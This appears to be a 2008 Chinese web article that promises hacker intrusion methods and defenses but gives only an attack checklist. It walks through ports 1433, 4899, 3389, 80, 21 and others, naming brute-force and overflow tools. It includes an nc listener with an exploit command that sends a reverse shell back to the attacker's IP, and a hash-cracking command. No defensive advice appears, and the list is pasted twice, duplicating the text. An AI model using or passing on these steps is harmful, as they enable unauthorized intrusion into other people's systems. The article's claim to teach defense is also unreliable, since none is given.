簡述常見黑客入侵方法以及工具防范
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 19:36:15 作者:佚名
我要評論

工欲善其事,必先利其器,本文簡單介紹目前黑客最常使用的一些入侵工具及防御的方法,希望能對大家有所幫助,以助于大家能更好地防御黑客的攻擊。
1. 1433端口入侵
scanport.exe 查有1433的機(jī)器
SQLScanPass.exe 進(jìn)行字典暴破(字典是關(guān)鍵)
工欲善其事,必先利其器,本文簡單介紹目前黑客最常使用的一些入侵工具及防御的方法,希望能對大家有所幫助,以助于大家能更好地防御黑客的攻擊。
1. 1433端口入侵
scanport.exe 查有1433的機(jī)器
SQLScanPass.exe 進(jìn)行字典暴破(字典是關(guān)鍵)
最后 SQLTools.exe入侵
對sql的sp2及以下的系統(tǒng),可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機(jī)端口 sqlhelloF.exe 入侵ip 1433 本機(jī)ip 本機(jī)端口
(以上反向的,測試成功)
sqlhelloz.exe 入侵ip 1433 (這個是正向連接)
2. 4899端口入侵
用4899過濾器.exe,掃描空口令的機(jī)器
3. 3899的入侵
對很早的機(jī)器,可以試試3389的溢出
對2000的機(jī)器,可以試試字典暴破。
4. 80入侵
對sp3以前的機(jī)器,可以用webdav入侵;
對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL進(jìn)行注入。(小榕的注入軟件)。
5. serv-u入侵(21端口)
對5. 004及以下系統(tǒng),可用溢出入侵。(serv5004.exe)
對5.1.0.0及以下系統(tǒng),可用本地提升權(quán)限。(servlocal.exe)
對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系統(tǒng)漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
進(jìn)行溢出入侵。
9. 3127等端口
可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。
1. 1433端口入侵
scanport.exe 查有1433的機(jī)器
SQLScanPass.exe 進(jìn)行字典暴破(字典是關(guān)鍵)
最后 SQLTools.exe入侵
對sql的sp2及以下的系統(tǒng),可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機(jī)端口 sqlhelloF.exe 入侵ip 1433 本機(jī)ip 本機(jī)端口
(以上反向的,測試成功)
sqlhelloz.exe 入侵ip 1433 (這個是正向連接)
2. 4899端口入侵
用4899過濾器.exe,掃描空口令的機(jī)器
3. 3899的入侵
對很早的機(jī)器,可以試試3389的溢出
對2000的機(jī)器,可以試試字典暴破。
4. 80入侵
對sp3以前的機(jī)器,可以用webdav入侵;
對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL進(jìn)行注入。(小榕的注入軟件)。
5. serv-u入侵(21端口)
對5. 004及以下系統(tǒng),可用溢出入侵。(serv5004.exe)
對5.1.0.0及以下系統(tǒng),可用本地提升權(quán)限。(servlocal.exe)
對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系統(tǒng)漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
進(jìn)行溢出入侵。
9. 3127等端口
可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。
相關(guān)文章
什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來攻擊頁面的,大家都有這樣的經(jīng)歷,就是在訪問論壇時,如果這個論壇比較大,訪問的人比較多,打開頁面的速度會比較慢,對不?!一般來說,訪問的人越多,論壇的頁2024-01-06Windows系統(tǒng)安全風(fēng)險-本地NTLM重放提權(quán)
入侵者主要通過Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認(rèn)證過程,利用NTLM重放機(jī)制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風(fēng)險微軟并不認(rèn)為存在漏洞,所以2021-04-15- 這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21
- 這篇文章主要介紹了sql手工注入語句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說過關(guān)于http和https的區(qū)別,對于加密的https,我們一直認(rèn)為它是相對安全的,可今天要講的是,一種繞過HTTPS加密得到明文信息的web攻擊方式,不知道這消息對你2016-08-10iPhone和Mac也會被黑 一條iMessage密碼可能就被盜了
一直以來蘋果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會導(dǎo)致用戶信息泄露。2016-07-27- 國家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀(jì)佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤記錄器進(jìn)入攻擊者郵箱
面對惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護(hù)能力都沒有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤記錄器,進(jìn)入攻擊者郵箱2016-07-06